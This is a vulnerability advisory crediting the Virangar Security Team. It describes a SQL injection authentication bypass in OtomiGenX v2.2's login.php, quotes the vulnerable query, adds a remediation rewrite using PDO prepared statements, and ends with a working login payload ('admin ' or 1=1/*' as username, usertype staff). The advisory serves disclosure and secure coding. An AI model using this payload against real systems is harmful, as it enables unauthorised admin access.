######################################################################################
#                                                                                    #
#  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities ::::....  #
#                                                                                    #
######################################################################################


Virangar Security Team


www.virangar.net

www.virangar.ir

--------

Discovered By: virangar security team (hadihadi)


special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) 

----------------

.::::admin Authentication bypass vuln::::.

// vulnerable code in login.php (from line 29):

...

line 29:

$passwd = md5($_POST[userPassword]);  // md5 hash password

if($_POST[userType] != 'Staff')
{
    // $_POST[userAccount] and $_POST[userType] are interpolated into the
    // query string as-is; only the password goes through md5()
    $sql = "SELECT userID, userName
            FROM user_account
            WHERE userAccount='$_POST[userAccount]' AND
                  userPassword='$passwd' AND
                  userType='$_POST[userType]' AND isApproved='1'";
}
else
    // staff branch: same unescaped $_POST[userAccount], no isApproved check
    $sql = "SELECT staffID, staffName, staffGroupID
            FROM staff
            WHERE staffAccount='$_POST[userAccount]' AND
                  staffPassword='$passwd'";

...
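The fix for the query above is to stop building the SQL string from request data. The following is an added example, not OtomiGenX's own code: the same two lookups rewritten with PDO prepared statements, so userAccount, userType and the password hash are bound as parameters rather than pasted into the query. It assumes an existing PDO connection in $pdo and the table and column names from the snippet above; the function name authenticate() is hypothetical.

```php
<?php
// Added example (not part of OtomiGenX): hardened replacement for the
// login.php query shown above. Assumes $pdo is an open PDO connection and
// the schema is the one used by the original snippet (user_account / staff).

function authenticate(PDO $pdo, array $post): ?array
{
    // Require every field to be present and to be a plain string, so an
    // array or missing value never reaches the query.
    foreach (['userAccount', 'userPassword', 'userType'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return null;
        }
    }

    // The original stores a bare MD5 of the password; it is kept here only so
    // the example matches the existing schema. password_hash() and
    // password_verify() are the proper replacement for a new schema.
    $passwd = md5($post['userPassword']);

    if ($post['userType'] !== 'Staff') {
        // Non-staff login: every request value is a bound parameter and the
        // isApproved check is kept, exactly as in the original query.
        $stmt = $pdo->prepare(
            'SELECT userID, userName
               FROM user_account
              WHERE userAccount  = :account
                AND userPassword = :passwd
                AND userType     = :type
                AND isApproved   = \'1\''
        );
        $stmt->execute([
            ':account' => $post['userAccount'],
            ':passwd'  => $passwd,
            ':type'    => $post['userType'],
        ]);
    } else {
        // Staff login: same treatment; no string is ever concatenated.
        $stmt = $pdo->prepare(
            'SELECT staffID, staffName, staffGroupID
               FROM staff
              WHERE staffAccount  = :account
                AND staffPassword = :passwd'
        );
        $stmt->execute([
            ':account' => $post['userAccount'],
            ':passwd'  => $passwd,
        ]);
    }

    // With bound parameters a value such as  admin ' or 1=1/*  is compared
    // literally against the column and simply matches no row.
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage from the login handler (replaces the $sql string built above):
// $user = authenticate($pdo, $_POST);
// if ($user === null) { /* reject login */ }
```

When the connection is to MySQL, also set `$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false)` so the binding is done by the server rather than by the client-side emulation; with either mode the parameters above are never interpreted as SQL.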



-----

Exploit:

User Name: admin ' or 1=1/*
Password : [whatever]
usertype : staff

--------------



